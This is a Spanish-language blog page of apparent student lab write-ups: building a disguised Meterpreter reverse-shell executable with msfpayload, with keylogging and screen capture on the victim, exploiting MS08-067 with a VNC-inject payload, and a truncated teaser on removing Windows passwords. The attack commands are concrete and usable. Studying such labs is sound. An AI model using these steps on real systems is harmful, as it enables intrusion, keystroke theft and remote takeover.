Category: Seguridad de SO


ATAQUE BACKDOOR

Aclaración:

El Siguiente ataque tiene fines académicos, no nos responsabilizamos del uso que se le dé a ésta información. Nuestro propósito es dar a conocer esta técnica para que usted se proteja de ataques similares.

Ataque BackDoor (Puerta Trasera)

Introducción:

¿Qué es Backdoor (Puerta Trasera)?

Es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta.

  • El Ataque Backdoor consiste en que un atacante remoto logra acceso ilegal a la máquina de un usuario y, eventualmente, puede tomar el control completo de la misma. Con sus puertas abiertas de par en par, la máquina afectada es el lugar perfecto para la recolección de datos sensibles.

Características:

  • Son invisibles por el usuario.
  • Se ejecutan en modo silencioso al iniciar el sistema.
  • Pueden tener acceso total a las funciones del  host-víctima.
  • Difícil eliminarlos del sistema ya que se instalan en carpetas de sistema, registros o cualquier dirección.
  • Usa un programa blinder para configurar y disfrazar al servidor para que la víctima no lo detecte fácilmente.

¿Qué se puede hacer con ataque Backdoor?

  • Ejecutar aplicaciones (instalaciones de programas, anular procesos, etc.).
  • Modificar parámetros de configuración del sistema.
  • Extraer y enviar información (archivos, datos, etc.) al host-victima.
  • Substraer o cambiar los password o archivos de password.
  • Mostrar mensajes en la pantalla.
  • Manipular el hardware de la host-víctima.
  • Acceso total a las funciones de la PC.

Objetivos del Ataque Backdoor:

Eludir los procedimientos habituales de autenticación al conectarse a una computadora. Instalándose una puerta trasera para permitir un acceso remoto más fácil.

Lograr una gran cantidad de computadoras infectadas para disponer de ellos libremente hasta el punto de formas redes de Zombies.

Diagrama del Ataque:

Usamos como Víctima:

Windows Xp SP3:

IP 192.168.94.132  NM 2555.255.255.0

Backtrack 5:

IP 192.168.94.133  NM 2555.255.255.0

Alcance:

“Cualquier medio capaz de ampliar el alcance del hombre es lo suficientemente poderoso como para derrocar su mundo. Conseguir que la magia de ese medio trabaje para los fines de uno, antes que en contra de ellos, es alcanzar el conocimiento.”  por Alan Kay

Por medio de este ataque nos referimos a una forma “no oficial” de acceso a un sistema o a un programa.

Estos programas no se reproducen solos como los virus, sino que usualmente nos son enviados con el fin de tener acceso a nuestros equipos a través del correo electrónico, por lo que no son fáciles de detectar y por si solos no siempre causan daños ni efectos inmediatos por su sola presencia, por lo que pueden llegar a permanecer activos mucho tiempo sin que nos percatemos de ello.

Como todo en Internet se basa en la arquitectura cliente/servidor, sólo se necesita instalar un programa servidor en una máquina para poder controlarla a distancia desde otro equipo, si se cuenta con el cliente adecuado, ésta puede bien ser la computadora de un usuario descuidado o poco informado.

Glosario:

  • SUDO.- permite a los usuarios ejecutar programas con los privilegios de seguridad de otro usuario (normalmente el usuario root) de manera segura. Se instala por defecto en /usr/bin.
  • MSFPAYLOAD.- línea de comandos de Metasploit que se utiliza para generar y dar salida a todos los diversos tipos de shellcode que están disponibles en Metasploit.
  • MSFCONSOLE.- Es un intérprete de comandos para realizar las pruebas sus penetración.
  • EXPLOIT.- Es un programa que explota una o varias vulnerabilidades en un software dado, frecuentemente es utilizado para ganar acceso a un sistema y tener un nivel de control sobre él.
  • PAYLOAD.- Es un programa que acompaña a un exploit para realizar funciones especificas una vez el sistema objetivo es comprometido, la elección de un buen payload es una decisión muy importante a la hora de aprovechar y mantener el nivel de acceso obtenido a un sistema, principalmente por el hecho de que en muchos sistemas existen firewalls, Antivirus y sistemas de detección de intrusos que pueden dificultar la actividad de algunos payloads.
  • SCREENSHOT.- Para capturar los elementos vistos en el monitor u otro dispositivo de salida visual.
  • KEYSCAN_START.- Para capturar los elementos que la victima teclee.
  • KEYSCAN_DUMP.- Para mostrar los elementos que fueron capturados.

Tutorial:

1. Instalar BackTrack 5

2. Ingresar con Usuario: root y Contraseña: toor. Para poner en modo gráfico tipear el: start x

3. Abrir Terminal

4. Modificar la dirección IP de nuestra máquina con el siguiente comando: sudo nano etc/network/interfaces

5. Se debe setear de manera estática : auto eth0 inet static. Nuestra IP debe ser parecida a la de la máquina Victima.

6. Crear el archivo ejecutable en nuestro caso se llamará juegos.exe:

msfpayload Windows/meterpreter/reverse_tcp LHOST= 192.168.94.133 LPORT=4444 X > juegos.exe

Luego se nos indica que el archivo ha sido creado.

Y a continuación lo podemos visualizar en Places/Home Folder:

Nota: Este archivo ejecutable lo podemos hacer llegar a la víctima, mediante ingeniería social, u otros medios como dispositivos de almacenamiento.

7. Para ir a la consola de MetaExploit usar el siguiente comando: msfconsole

Con esto se cargarán todas las herramientas para el ataque.

8. Para poder ejecutar los archivos que hemos enviado usar: use exploit/multi/handler

9. Ahora para encontrar vulnerabilidades de los puertos de la victima escribir:

set PAYLOAD Windows/meterpreter/reverse_tcp

Y setear nuestra IP y PUERTO

10. Necesitamos saber si todo lo hecho está correcto para ello utilizamos el comando: show options

11. Usar el siguiente comando: exploit.

Debemos esperar hasta cuando la víctima haya ejecutado el archivo.

12. En este caso por motivos académicos lo pasamos vía USB y lo ejecutamos en nuestra máquina Víctima.

13. Una vez que la victima haya ejecutado nos indicará que una sesión ha sido iniciada:

Ahora que ya tenemos Acceso a nuestra Victima podemos realizar los ataques.

14. Para capturar la pantalla de la victima usamos: screenshot /img.jpg

15. Otro ataque es saber todo lo que la victima teclee, para ello utlizamos el comando: keyscan_start, para inicializarlo. Y keyscan_dump para ver todo lo tecleado.

La victima escribe, y nos aparecerá en el terminal.

16. También podemos ver todos los directorios que tiene nuestra victima con el comando: ls

Podemos crear carpetas en la máquina victima por ejemplo: mkdir (nombre_de_carpeta)

17. Podemos ver los procesos que tiene activos por ejemplo: en Windows Xp (nuestra víctima) abrimos Internet Explorer.

Luego en el terminal (BackTrack) con el comando ps –aux (para ver los procesos)

Y con el comando Kill y el número de proceso, le matamos el proceso, en este caso: kill 1272

18. Finalmente un último ataque reiniciamos la máquina de la víctima con el comando: reboot

A continuación el vídeo

Recomendaciones:

  • Tener siempre el software actualizado pues así se instalan los parches de seguridad del sistema.
  • Procura no usar claves con nombres obvios asociados a los usuarios, preferible usa contraseñas de alta seguridad para evitar los ataques de diccionario.
  • Usa estricta política de manejo y control de los usuarios en carpetas compartidas.
  • Utilizar cuentas de usuario con privilegios limitados
  • Procura no instalar programas de dudosa procedencia ya sean estás descargas de internet, correos y medios extraíbles.
  • Configurar las zonas de internet Explorer y el filtrado de URL.
  • Activa el firewall (Filtrado y protección de las comunicaciones).
  • Evitar ejecutar programas de los que no sepamos su procedencia, tanto en anexos de correo, ICQ, messanger y descargas de Internet (ya sean vía Web o FTP).

Conclusiones:

  • Como reflexión sobre este tipo de ataque es que debemos tomar ciertas medidas básicas para estar a salvo de las puertas traseras y el delicado riesgo para la seguridad que estas representan.
  • Al realizar nosotros este tipo de ataque logramos darnos cuenta como tan fácilmente las personas caen sin saber que esto les puede causar riesgos en su computadoras, el cual por medio de esta experiencia adquirida sabemos como estar alertas y protegidos sobre este ataque.

Integrantes:

  • Vicky Bravo Romero
  • Vicente Cabrera Martínez
  • Jhonatan Ortega Veloz
  • Xiomara Torres Ruíz
  • Darwin Vargas

Siguenos en Twitter:

@VickyBravoRo  @VicEmys  @JH_1805  @XiomyAndrea22  @7Vargas15

ATAQUE METASPLOIT VNCINJECT

Introducción:

Es un tipo de ataque de autentificación remota, lo que significa que permite conectarnos remotamente a algún equipo sin tener los permisos necesarios, esto claro si el sistema operativo posee aquellas vulnerabilidades, como por ejemplo sistemas Windows desactualizados.

Objetivo:

Violar la seguridad de un Sistema Windows conectándonos remotamente a este sin tener los permisos necesarios. Para nuestro ejemplo sera un Windows Server 2003, en ejercicios de pruebas también pudimos atacar de la misma manera a Windows XP.

Herramientas a utilizar:

-BackTrack

-Windows Server 2003

Configuraciones de los equipos:

(Estas direcciones han sido utilizadas para nuestro ejemplo, lo importante para el ataque es que las maquinas se encuentren conectadas en la misma red)

– BackTrack

IP: 192.168.1.5

– Windows Server 2003

IP: 192.168.1.6

Revisión de las configuraciones antes de realizar el ataque:

Nos aseguramos de comprobar las Ips de nuestros equipos.

En BackTrack para conocer nuestra Ip abrimos un terminal y usamos el comando ifconfig

En Windows para conocer nuestra Ip abrimos una consola de cmd y usamos el comando ipconfig

Para verificar que hay conexión entre ambos equipos procedemos a realizar un ping, tanto como desde backtrack a windows como de windows a bactrack.

Para casos ya reales en los que no siempre tendremos acceso a la ip de nuestra victima podemos usar el comando nmap en backtrack, permitiendonos asi explorar la red, ver las maquinas conectadas, sus ips y que sistemas operativos poseen.

Procedimiento para realizar el ataque:

Ya previas revisiones de las direcciones y teniendo en claro lo que vamos a realizar, procedemos a seguir los siguientes pasos:

1) Abrimos un terminal desde BackTrack y usamos el comando msfconsole (este comando abre la interfaz MSF -> Metasploit Framework) y esperamos a que cargue la pantalla de bienvenida a la interfaz.

2) Usamos el comando show exploits (nos muestra las lista de los tipos de ataque disponibles), el comando es simplemente utilizado para recordar que tipo de ataque era el que vamos a usar. Ya que en nuestro caso el tipo de ataque es: windows/smb/ms08_067_netapi

Este paso puede ser omitido si se tiene claro que el tipo de ataque es: windows/smb/ms08_067_netapi

3) Usamos el comando use <tipo_de_ataque>

En nuestro caso seria:  use windows/smb/ms08_067_netapi 

4) Procedemos a setear (configuramos los parametros necesarios para realizar el ataque).

4.1) Seteamos el RHOST (Remote Host, que viene a ser la ip de nuestra victima).

El comando a utilizar es set RHOST <ip_victima>

Para nuestro ejemplo seria set RHOST 192.168.1.6

4.2) Seteamos el LHOST (Local Host, que viene a ser la ip de donde estamos realizando el ataque).

El comando a utilizar es set LHOST <ip_atacante>

Para nuestro ejemplo seria set LHOST 192.168.1.5

4.3) Mostramos los payloads (son los métodos del tipo de ataque seleccionado). Esto lo hacemos si no tenemos claro que payload setear. Pero para nuestro ejemplo sabemos que es: windows/vncinject/reverse_tcp

Entonces procedemos a usar el comando: set payload <metodo_ataque>

Para nuestro ejemplo seria: set payload windows/vncinject/reverse_tcp

5) Una vez configurados los parametros, procedemos a ejecutar el ataque con el comando: exploit

6) Finalmente se abre una interfaz donde podemos ver el escritorio de nuestra victima, hemos tomado el control mediante acceso remoto.

Recomendaciones:

Se recomienda tener todos los parches instalados de Windows XP, o de cualquier Sistema Operativo, así se disminuyen las vulnerabilidades.

Se recomienda actualizar constantemente el Sistema Operativo, para disminuir la vulnerabilidades del mismo.

Se recomienda usar software legal, si las licencias son muy caras, siempre se puede optar por el software libre.

Integrantes:

  • Anthony Filian Vivanco
  • Paul Padilla Sabando
  • Josue Cevallos Bayas
  • Christian Chamba Mendez

Integrantes:

  • Darwin Mariscal
  • Flor Cheing
  • Angelica Tomala
  • Adolfo Hidalgo
  • Byron Plua

En este Blog usted encontrará:

Atacar al windows indestructible con BackTrack y evaluar el ataque, indicando como se puede proteger al Sistema Operativo para evitar los diferentes ataques.

Video de Creacion de Window Indestructible:

Manual Instructivo

Integrantes:

Alejandro Domínguez

Elsa Monserrate

Gianella Luna
ATAQUE FISICO DE CONTRASEÑA (WINDOWS)

Antecedentes:
A través de la utilización de Backtrack se pueden hacer una serie de interesantes ataques, la que veremos a continuación es un ataque físico de contraseña para Windows ejecutado sobre directamente sobre el host, para el cual necesitamos un LiveCD de BackTrack.

Objetivos:

El objetivo es aprender más acerca de las diferentes utilidades que da una distribución de Linux en este caso Backtrack, además de saber aplicar los distintos casos de ataque para nuestro bien común sin daños a terceros.

Pasos a realizar del ataque:
1) Se tiene una máquina con Windows XP, Vista o 7 ((xp para el ejemplo)). Los diferentes Usuarios de la máquina están protegidos por contraseña, vamos a Eliminar dichas contraseñas para hacer accesible al equipo.

Sigue leyendo

INTEGRANTES:

ELSA MONSERRATE

ALEJANDRO DOMINGUEZ

GIANELLA LUNA

Antecedentes:

A través de la utilización de Backtrack se pueden hacer una serie de interesantes ataques, la que veremos a continuación es un ataque físico de contraseña para Windows ejecutado sobre directamente sobre el host, para el cual necesitamos un LiveCD de BackTrack.

Objetivos:

El objetivo es aprender más acerca de las diferentes utilidades que da una distribución de Linux en este caso Backtrack, además de saber aplicar los distintos casos de ataque para nuestro bien común sin daños a terceros. Pasos a realizar del ataque:
1) Se tiene una máquina con Windows XP, Vista o 7 ((xp para el ejemplo)). Los diferentes Usuarios de la máquina están protegidos por contraseña, vamos a Eliminar dichas contraseñas para hacer accesible al equipo.

Sigue leyendo